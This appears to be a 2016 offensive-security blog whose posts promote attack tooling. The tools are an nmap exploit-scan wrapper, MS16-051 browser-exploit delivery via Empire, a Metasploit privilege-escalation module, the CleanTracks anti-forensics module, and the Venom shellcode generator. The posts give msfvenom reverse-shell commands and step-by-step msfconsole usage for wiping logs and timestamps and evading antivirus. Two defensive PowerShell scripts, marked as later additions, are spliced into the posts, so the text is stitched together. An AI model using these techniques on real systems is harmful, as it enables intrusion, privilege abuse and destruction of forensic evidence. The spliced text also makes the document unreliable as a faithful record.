Sunday, 25 September 2016

Nmapii - It's All About Saving Time

Hey!! My past few days have been pretty lazy; only some rap and coffee kept me alive during the nights while working on my projects (some choices I have other than security B| ) :}

Anyways :P apart from being lazy, I was working on a tool called 'Nmapii' for automating nmap. It's not a normal nmap scanner that only scans for OS and ports; I've engaged some custom NSE scripts to do scans on other services and exploits (and I've used some default ones too).

Yeap, it saves time, because all you need to do is select the scan type you want to begin with.

So Nmapii is coded in Python, as it's best for quick development and quite fast at displaying results :| (sorry for being noobish)

[Nmapii - Main]


[Nmapii - Help]



[Nmapii - About]



Yea, that was a shameless part :P but everyone does it :P anyways, let's move on.

[Nmapii - Scans user can perform]



[Nmapii - In Action]




[Some Other Details ]

Custom NSE scripts engaged:

(i) PHPIPAM:

References:
Vendor: http://phpipam.net/
Vuln discovery: http://0day.today/exploit/25375
Module author: https://sourceforge.net/u/peterubuntu10/profile/

(ii) MS15-034:

References:
MS Security Bulletin: https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
Module author: https://sourceforge.net/u/peterubuntu10/profile/

[LOGS]

You can easily find all the logs of your scans in /home/.nmappi-logs
Each scan type is logged in its own directory.

[Installation]

1. git clone http://github.com/ChaitanyaHaritash/nmapii

2. cd ../path/nmapii/utils

3. sudo bash install.sh

4. sudo python nmapii.py

[Video Demo]





Feel free to modify it :) it's an open-source project.

Special thanks to : r00t 3xp10it & VIRkid thx bros ;D 
Greets to : SSA [Suspicious Shell Activity] & HSH [Hell Shield Hackers]
And shit for haters :V


         
                        

Saturday, 17 September 2016

MS16-051 within Empire

PowerShell Empire has been a great asset for those who wanna develop exploits in Python and plug them into an exploit handler other than MSF/ExploitPack.

So today's post is about an exploit which has been hot for the last couple of months, as I've read lots of posts about it.
It has also been used in some famous exploit kits; recently it was observed in the Neutrino exploit kit.

Yeap, it's the 'MS16-051' exploit, which is also known as the 'Internet Explorer vbscript_godmode exploit'.

It's available in Empire too; you can download the stager from here 

So let's start...... :D


[Installing EMPIRE And Adding New Stager]

Done with git clone


Let's add our stager 'ms16_051' to /Empire/lib/stager and run install.sh at /Empire/setup/install.sh.
Install apache2 if you don't have it; I hope everyone has it, as most testers use pentesting distros, so I'll leave this to you.


[Get Everything Ready]

Listener is all set 


Setting our stager up and getting our output HTML file :)  


So everything is set up here :) now let's wait for our victim to click the link pointing to our Apache :) 

[Personally Observed]

As I searched the internet for a test of this exploit on IE6, I didn't find a single post related to it. So I gave this exploit a try on IE6 too :P LOL it worked there too.  






Saturday, 3 September 2016

MSI_privilege_escalation (MSF module for privilege escalation in windows)

Sup guys? Hope u all doin well :)

Today's post is about a module SSA completed about a week ago. This module is all about privilege escalation in Windows-based sessions in Metasploit :)

So lets start :)

-- What is Privilege Escalation?

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.


(Wikipedia)

-- [Module Description]





-- [ Installation ]

Download module from following link : https://sourceforge.net/p/msf-auxiliarys/repository/ci/master/tree/MSI_privilege_escalation.rb

Now copy and paste it to the following MSF path:
ubuntu : /opt/metasploit-framework/modules/post/windows/escalate/
kali : /path/metasploit/modules/post/windows/escalate/

Now load msfconsole and type the following commands:
msf > reload_all
msf > use post/windows/escalate/MSI_privilege_escalation
msf post(MSI_privilege_escalation) > info


-- [ Module Advanced Options ]





-- Workflow of Module (configuring the required settings)

'GET_SYSTEM' allows users to elevate the current session (client) to NT AUTHORITY\SYSTEM using token impersonation.


'MSI_ESCALATION' allows users to CHECK/SET the 'AlwaysInstallElevated' registry keys remotely. If the reg key is already set to dword:1 on the target system, this function will warn the attacker
that the bypass is already active (so there is no need to change the reg key data again).

Keys at dword:0 are set to dword:1. Bypassed :)


'REVERT_PRIVS' allows users to set the 'AlwaysInstallElevated' registry keys back to their default (dword:0), so the attacker can restore all settings to the old defaults as well :) 
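The defender's side of the same registry keys, as an added example that is not part of the MSI_privilege_escalation module or this post: a PowerShell audit that reports whether the AlwaysInstallElevated policy is enabled on the host it runs on and, with -Remediate, resets both values to the dword:0 default. The two policy paths are the standard Windows Installer policy keys; the script structure, switch name and messages are assumptions for this example.

```powershell
# Added audit script (example code, not the module's). AlwaysInstallElevated makes
# Windows Installer run every MSI as SYSTEM, but only when BOTH policy values below
# are DWORD 1; a missing key or value counts as 0. -Remediate needs admin rights
# for the HKLM half. (Hypothetical helper names for this example.)
param([switch]$Remediate)

$policyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)
$valueName = 'AlwaysInstallElevated'

function Get-AlwaysInstallElevated {
    param([string]$Key)
    $item = Get-ItemProperty -Path $Key -Name $valueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }   # key or value absent: policy not enabled
    return [int]$item.$valueName
}

$state = foreach ($key in $policyKeys) {
    [pscustomobject]@{ Key = $key; Value = (Get-AlwaysInstallElevated $key) }
}
$state | Format-Table -AutoSize

# The weakness exists only when both hives agree; a single stray 1 is still worth fixing.
$enabledCount = @($state | Where-Object { $_.Value -eq 1 }).Count
if ($enabledCount -eq $policyKeys.Count) {
    Write-Warning "$valueName is ENABLED: any user can install MSI packages as SYSTEM."
} elseif ($enabledCount -gt 0) {
    Write-Warning "$valueName is 1 in one hive only; not effective yet, but clean it up."
} else {
    Write-Host "$valueName is not enabled (secure default)."
}

if ($Remediate) {
    foreach ($key in $policyKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name $valueName -Value 0 -Type DWord
    }
    Write-Host "Both $valueName values reset to 0. Enforce it centrally via GPO:"
    Write-Host "Windows Components > Windows Installer > 'Always install with elevated privileges' = Disabled"
}
```

Run it on a host that has been touched by the module's MSI_ESCALATION step and the first hive still showing 1 tells you REVERT_PRIVS was never run.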






-- General Errors 

This is a common error people might encounter; there is nothing wrong with the module. The reason is most likely an old version of Metasploit. So replace the class name with the default class name your MSF uses (the current one is MetasploitModule) and it'll work like it should :)



-- [Video Demo]




[Credits]

'r00t-3xp10it' =>  post-module author
  Inspiration: Ben Campbell | Parvez Anwar
  Module debug: Chaitanya [ SSA RedTeam ]

Thursday, 12 May 2016

CleanTracks - MSF Auxiliary For Anti-Forensics

Hello everyone, hope everyone's fine :) Today I'm gonna discuss an anti-forensics module for Metasploit coded by r00t 3xp10it - SSA.

We often hack our targets using Metasploit, but after we complete the exploitation, do we consider that the victim could call in forensics people to trace the attacker?

Metasploit doesn't have any module to do the anti-forensics job; CleanTracks is designed to remove the traces an attacker often leaves on the victim system and to finish the job without leaving any string leading back to the attacker :)

-- [IDEA]

As a long-time Metasploit Framework user I realized that in the actual database there does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successful exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in this task: 'clearev', which clears the Application, System and Security logs on a Windows system (Event Viewer), and 'timestomp', to manipulate the MACE (Modified, Accessed, Changed) times of a file/application (Windows systems)...
 

-- [ So, Basically, How Does CleanTracks Work? ]


Actually, CleanTracks removes all logs on a Windows system stage by stage and also uses the timestomp module to change the last accessed times of files like cmd.exe, rundll32.exe and USER32.exe.
CleanTracks is simple to use and works like all the other modules: set the required options, like the session ID. In the Metasploit DB there are only two modules (clearev, timestomp) which currently support anti-forensics, but not at the level CleanTracks does.

-- [Advanced Options]


-- [ Different Functions In CleanTracks To Remove All Traces ]


1. Prevent: Will elevate the privilege to "Administrator" and will get you the privilege of NT AUTHORITY\SYSTEM for the backdoor or payload. It will also prevent the creation of footprints on the victim system by adding some regedit keys.

2. Cleaner: clears temp/prefetch folders, flushes the DNS cache, clears event logs, shellbags, lnk, tmp, dat, etc. This stage should be run before leaving the current session.

3. timestomp: This step won't work like timestomp in normal MSF :) it just automatically changes the last modified and created dates of some files like cmd.exe, but it won't change the last accessed/used date and time, because cmd is constantly used by CleanTracks to execute the attacker's commands.

4. getsys: getprivs API call to elevate the current session to NT AUTHORITY\SYSTEM; it's advised to run it before any of the stages described above.

5. mace / sysmace: mace blanks the MACE values in the target directory you input, OR sysmace blanks the MACE values in the target's system32 directory. This option will change the MACE attributes of all files inside the selected directory to null values.

6. revert: Revert regedit policies to default values; this option will reverse all registry keys added by the CleanTracks.rb stage1 (prevent) option.

7. logoff: log off the target machine (optional, more effective).
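The defender's counterpart to the Cleaner stage, added here as an example and not part of CleanTracks or the original post: a PowerShell hunt for the events Windows itself records when a log is cleared. Those entries are written into the log that was just wiped, so a host-local copy can be destroyed in turn; forwarding logs to a collector (WEF or a SIEM) is what makes this check reliable. The parameter names are assumptions; -ComputerName may point at the host or at the collector.

```powershell
# Added detection example (not CleanTracks code). Windows writes a marker event
# whenever an event log is cleared:
#   Security log  Id 1102  "The audit log was cleared"          (who: SubjectUserName)
#   System log    Id  104  "The <name> log file was cleared"    (any other log)
# clearev-style wipes therefore leave at least these two breadcrumbs behind.
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [int]$Days = 7
)

$since = (Get-Date).AddDays(-$Days)
$filters = @(
    @{ LogName = 'Security'; Id = 1102; StartTime = $since },
    @{ LogName = 'System';   Id = 104;  StartTime = $since }
)

$hits = foreach ($f in $filters) {
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $f -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Log     = $_.LogName
                EventId = $_.Id
                Machine = $_.MachineName
                # First line of the message names the cleared log; 1102 also names the account.
                Detail  = ($_.Message -split "`r?`n")[0]
            }
        }
}

if ($hits) {
    $hits | Sort-Object Time | Format-Table -AutoSize
    Write-Warning "Log-clear events found on $ComputerName; correlate with the session timeline."
} else {
    Write-Host "No log-clear events on $ComputerName in the last $Days days."
}
```

An empty result on the host but hits on the collector is itself evidence that the local copy was cleared a second time after the marker event was written.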

           



-- [INSTALLING CLEANTRACKS]


For Ubuntu/Debian users: save the file in /opt/metasploit-framework/modules/auxiliary/analyze/ :) and in CleanTracks.rb change class MetasploitModule to Metasploit3 :) otherwise a compatibility issue may arise while reloading all modules :)) (I've experienced it) :P
 
Download clean tracks from here

 meterpreter > background
 msf exploit(handler) > reload_all
 msf exploit(handler) > use auxiliary/analyze/CleanTracks
 msf post(CleanTracks) > info
 msf post(CleanTracks) > show options
 msf post(CleanTracks) > show advanced options
 msf post(CleanTracks) > set [option(s)]
 msf post(CleanTracks) > exploit

-- [SOME EXPLOITING EXAMPLES]


Stage 1 :

 msf post(CleanTracks) > set getsys true
 msf post(CleanTracks) > set prevent true
 msf post(CleanTracks) > exploit

                                                                       
Before using prevent function ....


Prevent successfully launched :)



Regedit keys changed ;)



Stage2 :

 msf post(CleanTracks) > unset getsys
 msf post(CleanTracks) > set cleaner true
 msf post(CleanTracks) > exploit


Cleaner successfully launched ;)



timestomp :

 msf post(CleanTracks) > unset getsys
 msf post(CleanTracks) > unset cleaner
 msf post(CleanTracks) > set  dirmace Path_to_folder
 msf post(CleanTracks) > exploit

Before using function

Function executed Successfully

Proof Of Concept ;)


CleanTracks - Anti-forensics auxiliary
Supporters: Betto Avalos [debugging], Chaitanya [debugging], Spirit [debugging]


Sunday, 13 March 2016

Venom 1.0.11 - Automatic Shellcode Generator


Hi guys, it's been so long since I last posted. So today I'm gonna talk about a multi-shellcode generator known as "Venom". Yeah, it's called Venom because part of its job is played by a well-known Metasploit tool, "msfvenom". Venom was developed by r00t-3xp10it and the concept was by Chaitanya. This project took about 5 months to complete, but finally it's public now.




Anyways, first of all I wanna shed some light on the term "shellcode" and what it is.  
In computer security , a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code. 
-- Wikipedia 
So now the thing is, we can find so many shellcodes on shell-storm, 0day.today, exploit-db, etc., so why do we need Venom especially?    

As the name says (automatic shellcode generator), it generates shellcode using msfvenom.
Using msfvenom directly requires learning long commands and takes time, but Venom gives you several choices of what kind of payload to generate. Also, it's noob friendly: select your payload type and you are ready to roll. 
The main goal of this tool is not to build 'FUD' payloads!... but to give its users a first glance at how shellcode is built, embedded into a template (any language), obfuscated/encrypted (e.g. pyherion.py) and compiled into an executable file format. The goal of this project is to show how the shellcode works, and also to show that tools like veil-evasion, powersploit and unicorn use msfvenom to build shellcode. I've tried to show all stages from the construction of the shellcode, hoping to explain how things were made by others and what techniques they have used, and to show that many of these projects are truly community (automated) projects … 





Let's Understand How Venom Works …  

First of all... install Venom's dependencies; the setup also checks whether they are already installed and, if so, whether they are installed properly. setup.sh in the directory .../venom/aux/ manages installing all dependencies like zenity, msfconsole, wine, pyinstaller, mingw32, etc. with just one run.

[ DEPENDENCIES ]
Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe)
mingw32 (compile .EXE executables) | pyherion.py (crypter)
PEScrambler.exe (PE obfuscator/scrambler) | apache2 | wine/winrar
vbs-obfuscator | encrypt_PolarSSL | ettercap (dns_spoof)



Now that setup.sh has done its work, let's move to venom.sh at /venom/venom.sh.
This is the main file, where you decide which payload you should start with or which payload you need.




Venom prompts a disclaimer before the main menu appears: "The author doesn't hold any responsibility for any bad use of Venom. Remember that attacking targets without prior consent is illegal."


The main menu of Venom, where you can select the format your shellcode should be compiled to. There are 17 choices; some are FUD as well. But as said above, this tool isn't meant to make FUD stubs; it's for educational purposes only, showing how shellcode works.


Let's dive deeper into Venom's working.....

How Venom Works, Basically?


The script will use msfvenom (Metasploit) to generate shellcode in different
formats ( c | python | ruby | dll | msi | hta-psh ), inject the generated shellcode into a template (example: python; "the Python function will execute the shellcode in RAM") and use compilers like gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file; it also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, powersploit, etc., etc. "P.S. some payloads are undetectable by AV solutions... yes!!!" One of the reasons for that is the use of a function to execute the 2nd stage of the shell/meterpreter directly in the target's RAM.

How Venom Actually Builds Shellcode? 


The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe
But msfvenom allows us to build shellcode in different formats like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh, macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c, java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command:
sudo msfvenom --help-formats
Now let's generate a simple shellcode for windows/shell/reverse_tcp, choosing powershell as the output format. "Note that we will not use the -o (save the payload) flag; this way the generated shellcode will only be displayed in the current terminal window."

Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

[ Some Useful Links ]
Venom tutorials : https://www.youtube.com/user/MrPedroubuntu
Venom tuto2 : https://www.youtube.com/channel/UCZAVZ79MVA6wWOv1VPkVm7g
Git : https://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/
Metasploit : http://metasploit.com/

Usage :

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell venom
cd venom/aux
bash setup.sh

After installing all dependencies:

./venom.sh

Updates:

cd venom
git pull origin master

If broken, you can download the mirror manually at: http://sourceforge.net/code-snapshots/git/c/cr/crisp-shellcode-generator/shell.git/crisp-shellcode-generator-shell-a4bd07df390856096dc2788d46b9838c60bd1c28.zip

[ SPECIAL THANKS/CREDITS TO ]:
HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)
@harmj0y (pyherion) | @G0tmi1k @chris truncker @harmj0y (ruby_stager)
ReL1K (pyinstaller) | astr0baby (reflective fud dll injection method)
0entropy (powershell poc's) | Matthew Graeber (powershell poc's)
alor&naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya Haritash (debugging & Channelizing to concept) |
Suriya Prakash (debugging/recording tutorials) | and of course r00t-3xp10it  ^_^